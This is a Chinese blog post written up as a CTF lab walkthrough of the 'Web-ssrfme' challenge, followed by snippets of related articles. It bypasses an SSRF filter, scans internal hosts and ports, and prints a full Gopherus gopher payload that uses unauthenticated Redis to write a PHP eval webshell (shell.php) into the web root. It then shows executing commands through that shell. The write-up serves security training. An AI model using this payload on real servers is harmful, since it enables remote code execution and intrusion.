Web-ssrfme

最新推荐文章于 2024-10-06 15:37:08 发布
最新推荐文章于 2024-10-06 15:37:08 发布
阅读量663 收藏 12
点赞数 18
文章标签: 安全 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CvtNhso/article/details/141537319
版权

SSRF介绍

SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

构建dockers环境

分析代码

通过审计代码可以看到它有curl_exec()函数
但是它将file,dict,127.0.0.1等进行了过滤很明显它是阻止我们访问内网的端口和内网的文件数据

首先我们来看看curl_exec()这个函数

它是PHP中用于执行一个cURL会话并获取服务器响应的函数。它是cURL库的一部分,cURL是一个功能强大的库,用于发送和接收数据,并与远程服务器进行交互。cURL支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,使得它能够与各种类型的服务器进行通信,获取或发送数据。

通过过代码我们还可以看到只要有info这个参数就可以看到phpinfo()

所以我们这样写

再看看phpinfo()中有什么可用的信息

这里可以看到它将本地ip地址暴露出来,那么就绕过之前的限制,我们用http协议先试下能不能探测出端口,因为探测端口我们在前端看不出什么信息,那使用bp快速爆破下,查看报文的长度看能否爆出一些信息

抓包

抓包发送到爆破模块

可以看到只有80端口开放这对我们来说没什么用
但是在正常项目中不可能只有一台主机,所以继续使用bp扫描一下

可以看到有一个IP为172.18.0.2的主机

继续扫描这太主机的端口

可以看到它开放了6379这个端口

写木马

那么接下来就传webshell就可以了,在172.21.0.2的物理路径下传webshell,那么他的物理路径是啥,不知道,只能猜或者测试一般情况下,都是放在/var/www/html下面,但不保证他会不会改,一般都是怕麻烦不会改的

使用gopher工具

下载地址:GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers

下载并解压后运行install.sh文件

它使用的是python2使用这里的目录要么是猜要么扫描或者默认路径

先把它生成的内容拿出来看看
解码后得到

gopher://127.0.0.1:6379/_*1
$8
flushall  #这个命令清空了 Redis 数据库中的所有数据,清除了所有的键值对
*3
$3
set   #命令用于向 Redis 写入一个键值对,这里的键是 1,值是 PHP 代码片段
$1
1
$31


<?php eval($_POST['1']); ?>


*4
$6
config  #config set dir /var/www/html/upload:将 Redis 的保存目录设置为 
         /var/www/html/upload,这是一个 Web 服务器可以访问的目录。
$3
set
$3
dir
$20
/var/www/html/upload 
*4
$6
config   #将 Redis 的数据库文件名设置为 shell.php。这意味着当 Redis 保存数据时,它会在 dir 指 
         定的目录下生成一个名为 shell.php 的文件
$3
set    
$10
dbfilename
$9
shell.php
*1
$4
save #命令强制 Redis 将内存中的数据保存到磁盘。由于 Redis 现在的保存目录是 
     /var/www/html/upload,文件名是 shell.php,所以会在 /var/www/html/upload 目录下生成一个包 
      含恶意 PHP 代码的 shell.php 文件。

接下来我们将生成后的payload进行二次编码

然后访问

之后我们包含进来

成功执行

之后我们只需要将我们的phpinfo()换成命令执行即可

二次编码后访问成功获取flag

夏天的海!
关注
Web-SSRFMe
Code-5的博客
08-25 330
利用 SSRF 漏洞: 攻击者使用 SSRF 漏洞向 Redis 服务器发起请求。由于 SSRF 漏洞允许攻击者指定任意 URL,攻击者可以将 url 参数设置为 Redis 服务的地址,比如 http://127.0.0.1:6379(Redis 默认端口)。 Redis 未授权访问: 如果 Redis 没有配置密码保护(即默认未授权访问),攻击者可以通过 SSRF 漏洞直接与 Redis 服务器通信。 Redis 的默认端口是 6379,攻击者可以利用 SSRF 漏洞发起对这个端口的请求,获取 Re
web-ssrfme
beizhibuhuiqiaod的博客
08-25 284
可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。
Web-ssrfme复现
m0_64238664的博客
08-25 597
但是查看代码发现,过滤了file、dict、localhost等,过滤dict是为了防止探测端口。这里看见了,打印了两次也就是读取了两次文件,我就可以尝试使用端口探测burp。可以看到6379的端口也开放着,访问一下出现redis的报错就可以攻击了。查看代码发现,存在url接收参数,传递参数尝试是否含有。可以尝试一下url能不能有打印的东西。除了80端口也就2.3有点可疑。通过docker拉取环境。,发现确实存在ssrf。要进行url编码在攻击。
一道ssrf题目--Web-ssrfme
banliyaoguai的博客
08-26 1735
我们可以传webshell到服务器上,但是这个需要我们知道物理路径,这道题目物理路径我们是不知道,需要我们猜测,我们尝试一些默认路径/var/www/html、 /usr/shart/nginx/html,发现都不行。现在我们怀疑是不是权限不够的原因,权限不够那咋个办,我们再找一下在html下有没有别的文件权限是够的。我们接着尝试,我们现在发现服务器的IP是172.21.0.3这个端口,这是在内网当中,在内网当中服务器可能会很多,并且服务器IP可能是连续的,我们可以尝试一下有没有别的服务器供我们入侵。
ssrf--web-ssrfme例题
m0_65350813的博客
08-24 250
给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。我们使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。只开放了一个80端口,也没有数据库,如果按172.21.0.3路径一直找端口,肯定是不行的。
关于SSRF的相关案例(2月公开赛Web-ssrfme)
m0_52326740的博客
08-25 589
给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。只开放了一个80端口,也没有数据库,如果按172.21.0.3路径一直找端口,肯定是不行的。当端口为6379的时候,没有任何区别。
2月公开赛Web-ssrfme
weixin_63032002的博客
08-24 440
因为源码过滤了file、dict协议,但没有过滤http和gopher协议,所以我们可以使用http协议进行内。在/var/www/html目录下写文件,我们使用burp扫一下都有哪些目录,发现有个upload目录。接着我们便可以尝试 redis 未授权访问攻击,由于这台内网主机上还存在一个http服务,所以我们。到攻下这台内网主机的突破口,我们可以使用ssrf扫描一下这个内网主机的端口,这里使用。这就是典型的redis报错,说明这台主机上存在redis服务。将生成的payload放入url狸猫发送过去,
Web-ssrfme--redis 未授权访问攻击
qq_63034068的博客
08-25 487
但是我们尝试发现不能直接在/var/www/html目录下写文件,我们使用burp扫一下都有哪些目录,发现有个upload目录。明显这里是可以访问到其他的,这里代码禁用了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议我们使用http协议进行内网主机存活探测。但是当前还不能找到攻下这台内网主机的突破口,我们可以使用ssrf扫描一下这个内网主机的端口,这里使用burpsuite。此时我们查看info。发现6379是打开的。
CTF-2020网鼎杯-玄武组-web题-ssrfme知识回顾
山下南徒的博客
05-31 3343
CTF-2020网鼎杯-玄武祖-web题-ssrfme知识回顾 思路:SSRF结合redis主从复制RCE Tip:使用DNS重绑定绕过限制 参考笔记:redis 主服务器:192.168.8.103 从服务器:192.168.8.104,redis 5.0.8(bind 0.0.0.0,关闭安全模式),centos 7(关闭防火墙) 第一步:使用脚本redis-rogue-server伪装redis主服务器: python3 redis-rogue-server.py --server-only 第二步:
web-ssrfme环境
08-25
使用docker-compose安装
Web-ssrfme docker包
08-24
Web-ssrfme docker包
【网络安全 | JAVA代码审计】基础安全问题和解决方法初探
等风来
10-02 686
无占位符的预处理,其实质仍然是通过字符串拼接的方式来构造SQL语句,SQL注入依然存在,这是开发中需要谨记的。
速盾:免备案服务器
zhuguowang01的博客
10-04 450
然而,速盾提供的免备案服务器解决方案,为用户提供了更便捷的选择。免备案服务器的优势不仅仅在于省去备案的时间和过程,还能提供更安全、更稳定的服务。速盾的免备案服务器集成了多项安全防护技术,如DDoS防护、WEB防护等,可以有效抵御各类网络攻击,保护用户网站的安全。然而,免备案服务器也存在一些限制。在一些具有严格备案要求的行业,比如互联网新闻、游戏、电商等,使用免备案服务器可能会违反相关法律法规,带来一定的风险。通过速盾提供的免备案服务器解决方案,用户可以省去繁琐的备案流程,快速上线网站,提高网站的竞争力。
操作系统-磁盘管理
wlq_567的博客
10-01 577
磁盘管理是操作系统中一项重要的功能,主要用于管理计算机存储设备的分区、格式化、分配和维护。通过磁盘管理,用户可以创建、删除、扩展或缩小磁盘分区,以优化存储空间的使用。此外,磁盘管理还支持不同文件系统的格式化,如NTFS和FAT32,确保数据的安全性和兼容性。
2024/10/1 408大题专训之磁盘管理
m0_63504902的博客
10-01 320
2021:2019:
数据库有哪些身份验证技术
最新发布
lunan的博客
10-06 831
梧桐数据库(WuTongDB)是基于 Apache HAWQ 打造的一款分布式 OLAP 数据库。产品通过存算分离架构提供高可用、高可靠、高扩展能力,实现了向量化计算引擎提供极速数据分析能力,通过多异构存储关联查询实现湖仓融合能力,可以帮助企业用户轻松构建核心数仓和湖仓一体数据平台。2023年6月,梧桐数据库(WuTongDB)产品通过信通院可信数据库分布式分析型数据库基础能力测评,在基础能力、运维能力、兼容性、安全性、高可用、高扩展方面获得认可。梧桐数据库(WuTongDB)相关文章。
【Docker】Docker 容器的使用指南:如何进入容器并运行命令
人生苦短,睡觉要紧,睡醒再说
10-01 1878
Docker 是一个开源的应用容器引擎,能轻松创建、部署和运行分布式应用。本文将介绍如何进入 Docker 容器并在其中运行命令,包括常用命令示例与说明。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值